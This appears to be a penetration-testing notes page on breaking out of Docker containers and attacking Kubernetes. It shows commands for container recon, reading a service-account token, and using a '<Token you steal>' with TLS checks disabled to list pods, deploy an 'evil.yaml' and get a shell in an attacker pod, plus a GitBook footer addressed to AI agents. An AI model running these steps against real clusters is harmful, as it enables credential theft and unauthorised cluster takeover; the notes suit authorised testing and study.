# Container/Sandbox Breakout

## Docker

I first check the **hosts** for any potential cues of containerization and/or any other nodes on the network. You can also try running the binary **capsh**. If it exists, this can be used to print current container capabilities.

```
cat /etc/hosts #check for container id leik 8u9ru98432
capsh --print #check current unix capabilites

ls -l /proc/*/ns #list proc

ls -al /dev/ | grep disk #check for disks
```

## Kubernetes

Try getting secrets.

```
cat /var/run/secrets/kubernetes.io/serviceaccount/token
```

List what you can do with this token

```
kubectl --token "$(cat token.txt)" --insecure-skip-tls-verify --server=https://team.thm:6443 auth can-i --list
```

### Get pods & configs

```
kubectl get pods -o yaml > backup.config \
	--server="https://kube-serv:6443" \
	--token='<Token you steal>' \
	--insecure-skip-tls-verify=true 
```

```
kubectl get pods \
	--server="https://kube-serv:6443" \
	--token='<Token you steal>' \
	--insecure-skip-tls-verify=true 
```

### Build & Deploy

```
kubectl  apply -f ./evil.yaml \
	--server="https://kube-server:6443" \
	--token='<token you steal>' \
	--insecure-skip-tls-verify=true 
```

### Execute command&#x20;

```
kubectl exec -it attacker \
	--server="https://kube-server:6443" \
	--token='<Token you steal>' \
	--insecure-skip-tls-verify=true \
	-- bash
```

### Basic commands

```bash
kubectl version #Get client and server version
kubectl get pod
kubectl get services
kubectl get deployment
kubectl get replicaset
kubectl get secret
kubectl get all
kubectl get ingress
kubectl get endpoints

#kubectl create deployment <deployment-name> --image=<docker image>
kubectl create deployment nginx-deployment --image=nginx
#Access the configuration of the deployment and modify it
#kubectl edit deployment <deployment-name>
kubectl edit deployment nginx-deployment
#Get the logs of the pod for debbugging (the output of the docker container running)
#kubectl logs <replicaset-id/pod-id>
kubectl logs nginx-deployment-84cd76b964
#kubectl describe pod <pod-id>
kubectl describe pod mongo-depl-5fd6b7d4b4-kkt9q
#kubectl exec -it <pod-id> -- bash
kubectl exec -it mongo-depl-5fd6b7d4b4-kkt9q -- bash
#kubectl describe service <service-name>
kubectl describe service mongodb-service
#kubectl delete deployment <deployment-name>
kubectl delete deployment mongo-depl
#Deploy from config file
kubectl apply -f deployment.yml
```

<https://github.com/TurboWindX/kube-hunter>

<https://github.com/TurboWindX/peirates>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://book.turbosec.net/post-exploitation/container-sandbox-breakout.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.